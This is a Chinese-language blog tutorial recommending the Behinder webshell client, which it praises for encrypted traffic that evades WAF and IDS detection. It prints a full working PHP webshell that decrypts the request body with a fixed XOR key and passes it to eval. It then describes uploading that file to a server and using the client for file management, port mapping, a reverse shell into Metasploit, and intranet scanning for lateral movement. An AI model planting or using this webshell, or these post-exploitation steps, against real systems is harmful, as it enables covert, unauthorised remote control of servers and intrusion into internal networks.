在之前的文章中,我们已经介绍了许多 WebShell 管理工具,比如蚁剑(AntSword)、Weevely 等。本文将向大家推荐另外一款神器:冰蝎(Behinder)。
关于冰蝎
冰蝎是一款动态二进制加密网站客户端,以其流量动态加密的特性而闻名,使得攻击特征对安全设备(如 WAF、WebIDS)难以检测。
冰蝎通信过程中采用 AES(高级加密标准,对称加密)进行加密。Java 和 .NET 默认支持 AES,而在 PHP 中需要开启 OpenSSL 扩展。在 V2.0 版本之后,冰蝎会根据服务端支持情况动态选择加密方式,使其更加强大。而在 V3.0 中引入了预共享密钥,实现全程无明文交互,给 WAF、IDS 设备的威胁检测带来了挑战。
在 Kali 中的安装
在常规情况下,冰蝎需要 Java 环境。由于 Kali 中已经预先安装了 Java,因此我们无需再次安装。但如果是其他环境,则需要先安装 Java 环境。您可以从项目地址 https://github.com/rebeyond/Behinder/releases 下载最新版本的安装包。
下载完成后,文件目录结构如下:
运行
只需执行以下命令即可运行:
java -jar Behinder.jar
使用
生成 WebShell
关于密码
我们需要在一个 MD5 加密网站上生成密码,然后将生成的 MD5 值的小写 32 位前 16 位作为密码。
点击生成服务端后,文件将存放在 server/default_xor_base64/ 目录下。
<?php @error_reporting(0); function Decrypt($data) { $key=”e45e329feb5d925b”; $bs=”base64_”.”decode”; $after=$bs($data.””); for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; } return $after; } $post=Decrypt(file_get_contents(“php://input”)); @eval($post); ?>
对 PHP 文件进行扫插
[图片]
上传服务器测试
将生成的 PHP 文件上传到服务器,并进行连接。
基本信息
文件管理
端口映射
反弹 Shell
您可以根据提示配置 Metasploit 相关信息,然后点击 “给我连”,此时会将会话反弹至 Metasploit 中。
内网主机扫描
利用此功能,可以扫描同一局域网内的设备,从而实现横向渗透。
暂无评论内容